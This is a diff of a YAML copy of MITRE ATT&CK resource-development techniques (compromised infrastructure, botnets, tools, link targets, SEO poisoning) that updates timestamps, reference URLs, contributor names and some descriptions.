+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -109519,7 +110191,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -109606,11 +110278,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -109670,7 +110341,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -109712,7 +110382,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -109727,7 +110397,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -109818,11 +110487,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -109855,15 +110523,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -109947,7 +110616,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -110001,7 +110669,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -110052,36 +110719,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -110090,21 +110731,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -110150,17 +110817,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -110186,7 +110852,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -110218,8 +110884,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -110246,7 +110910,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -110270,8 +110934,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -110297,7 +110959,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -110331,8 +110993,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -110380,7 +111040,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -110396,7 +111056,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -110455,54 +111114,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -110513,22 +111128,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -110591,37 +111250,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -110645,11 +111305,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -110707,17 +111370,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -110725,7 +111389,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -110739,7 +111403,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -110772,11 +111436,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
